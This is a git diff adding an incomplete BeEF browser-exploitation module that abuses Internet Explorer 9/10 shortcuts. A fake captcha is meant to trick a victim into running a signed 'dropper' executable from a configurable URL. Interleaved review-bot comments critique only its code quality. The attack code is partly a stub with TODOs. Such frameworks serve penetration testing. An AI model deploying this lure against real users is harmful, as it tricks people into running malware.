diff --git a/modules/social_engineering/ui_abuse_ie/command.js b/modules/social_engineering/ui_abuse_ie/command.js
new file mode 100644
index 000000000..7147fcace
--- /dev/null
+++ b/modules/social_engineering/ui_abuse_ie/command.js
@@ -0,0 +1,77 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+ if(beef.browser.isIE()){
+
+ getLanguage = function(){
+ var lang = null;
+ switch (beef.browser.getBrowserLanguage().substring(0,2)){
+ case "en":
+ lang = "en";
+ break;
+ case "it":
+ lang = "it";
+ break;
+ }
+ return lang;
+ };
+
+ grayOut = function(vis, options) {
+ var options = options || {};
+ var zindex = options.zindex || 50;
+ var opacity = options.opacity || 70;
+ var opaque = (opacity / 100);
+ var bgcolor = options.bgcolor || '#000000';
+ var dark=document.getElementById('darkenScreenObject');
+ if (!dark) {
+ var tbody = document.getElementsByTagName("body")[0];
+ var tnode = document.createElement('div');
+ tnode.style.position='absolute';
+ tnode.style.top='0px';
+ tnode.style.left='0px';
+ tnode.style.overflow='hidden';
+ tnode.style.display='none';
+ tnode.id='darkenScreenObject';
+ tbody.appendChild(tnode);
+ dark=document.getElementById('darkenScreenObject');
+ }
+ if (vis) {
+ var pageWidth='100%';
+ var pageHeight='100%';
+ dark.style.opacity=opaque;
+ dark.style.MozOpacity=opaque;
+ dark.style.filter='alpha(opacity='+opacity+')';
+ dark.style.zIndex=zindex;
+ dark.style.backgroundColor=bgcolor;
+ dark.style.width= pageWidth;
+ dark.style.height= pageHeight;
+ dark.style.display='block';
+ } else {
+ dark.style.display='none';
+ }
+ };
+
+ spawnPopunder = function(){
+ //TODO this will be replaced with a webpage served by BeEF
+ var pu = window.open('popunder.html','','top=0, left=0,width=500,height=500');
+ pu.blur();
+ };
+
+ if(beef.browser.isIE9()){
+ // [TAB] + shortcut
+ $(document.body).attr('onclick', 'spawnPopunder();');
+ }else if(beef.browser.isIE10()){
+ // just shortcut
+ $(document.body).attr('onclick', 'spawnPopunder();');
+
+ //TODO Using Gray-out, display the fake captcha with the 2 gifs
(base64 the gif content and use dataURI inline image)
+ }else{
+ // unsupported IE version
+ }
+ }
+});
+
diff --git a/modules/social_engineering/ui_abuse_ie/config.yaml b/modules/social_engineering/ui_abuse_ie/config.yaml
new file mode 100644
index 000000000..28ceca63c
--- /dev/null
+++ b/modules/social_engineering/ui_abuse_ie/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ ui_abuse_ie:
+ enable: true
+ category: "Social Engineering"
+ name: "User Interface Abuse (IE 9/10)"
+ description: "This module is based on Rosario Valotta research (https://sites.google.com/site/tentacoloviola/). The executable to be run needs to be signed (best thing is signing it with Symantec EV-SSL). The victim is tricked to press [TAB]+R (IE 9) or simply R (IE 10), which are keyboard shortcuts for the modeless dialog option "Run". Depending on the browser language, the modeless dialog shortcuts are different. For example, R for English, E for Italian. In order to achieve such behavior, a fake captcha is displayed."
+ authors: ["Rosario Valotta", "antisnatchor"]
+ target:
+ working: ["IE"]
\ No newline at end of file
diff --git a/modules/social_engineering/ui_abuse_ie/module.rb b/modules/social_engineering/ui_abuse_ie/module.rb
new file mode 100644
index 000000000..6fc52d4a1
--- /dev/null
+++ b/modules/social_engineering/ui_abuse_ie/module.rb
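Review bot: In command.js, `getLanguage`, `grayOut` and `spawnPopunder` are assigned without any declaration, so all three become implicit globals on the hooked page's `window`, and the first two are never called anywhere in this hunk. Only `spawnPopunder` has to be reachable globally, because the `onclick` attribute string resolves it by name, so I would write `window.spawnPopunder = function(){` explicitly and declare the other two with `var` (or leave them out until the TODO that needs them lands). The IE9 and IE10 branches currently run the identical `attr('onclick', 'spawnPopunder();')` call, which also replaces any `onclick` the page had already set on `body`; a short comment such as `// placeholder: both versions share the handler until the captcha overlay exists` would tell the next reader the duplication is intentional.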
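Review bot: The `description` value in config.yaml is a double-quoted scalar that contains unescaped double quotes around `Run`, so the string ends right after `option ` and the remainder of the line is likely to make the YAML loader reject the file. Escape them as `\"Run\"` or use single quotes inside the text, `'Run'`. `working: ["IE"]` is also broader than the IE 9/10 stated in `name`, while command.js does nothing on other IE versions. Because command.js and module.rb still carry TODOs for the core behaviour, `enable: false` would be the safer default until the module is complete.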
@@ -0,0 +1,28 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+################################################################################
+# Based on the PoC by Rosario Valotta
+# Ported to BeEF by antisnatchor
+# For more information see: https://sites.google.com/site/tentacoloviola/
+################################################################################
+class Ui_abuse_ie < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name' => 'dropper_url', 'ui_label' => 'Executable URL (must be signed)', 'value' => 'http://dropper_url/dropper.exe'}
+ ]
+ end
+
+ #TODO pre-execute -> read popunder.html, replace placeholder, and serve it mounting a new URL
+
+ def post_execute
+ content = {}
+ content['results'] = @datastore['results']
+ save content
+ end
+
+end
+
diff --git a/modules/social_engineering/ui_abuse_ie/templates/en-captcha.jpg b/modules/social_engineering/ui_abuse_ie/templates/en-captcha.jpg
new file mode 100644
index 000000000..bf296ff71
Binary files /dev/null and b/modules/social_engineering/ui_abuse_ie/templates/en-captcha.jpg differ
diff --git a/modules/social_engineering/ui_abuse_ie/templates/it-captcha.jpg b/modules/social_engineering/ui_abuse_ie/templates/it-captcha.jpg
new file mode 100644
index 000000000..9fa515fea
Binary files /dev/null and b/modules/social_engineering/ui_abuse_ie/templates/it-captcha.jpg differ
diff --git a/modules/social_engineering/ui_abuse_ie/templates/popunder.html b/modules/social_engineering/ui_abuse_ie/templates/popunder.html
new file mode 100644
index 000000000..fc4319318
--- /dev/null
+++ b/modules/social_engineering/ui_abuse_ie/templates/popunder.html
@@ -0,0 +1,13 @@ + + + + + + + + + + + \ No newline at end of file
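Review bot: In module.rb the `dropper_url` option is declared in `self.options` but nothing in this commit reads it: command.js has no placeholder for it and the pre-execute step is only a TODO, so editing the field in the UI has no effect. `post_execute` likewise saves `@datastore['results']`, yet command.js never sends a result back, so as far as this diff shows the stored value will always be empty. I would record both next to the existing TODO, for example `# NOTE: dropper_url is not consumed yet and command.js sends no 'results' value`. As a style point, the explicit `return` before the array literal in `self.options` is unnecessary in Ruby.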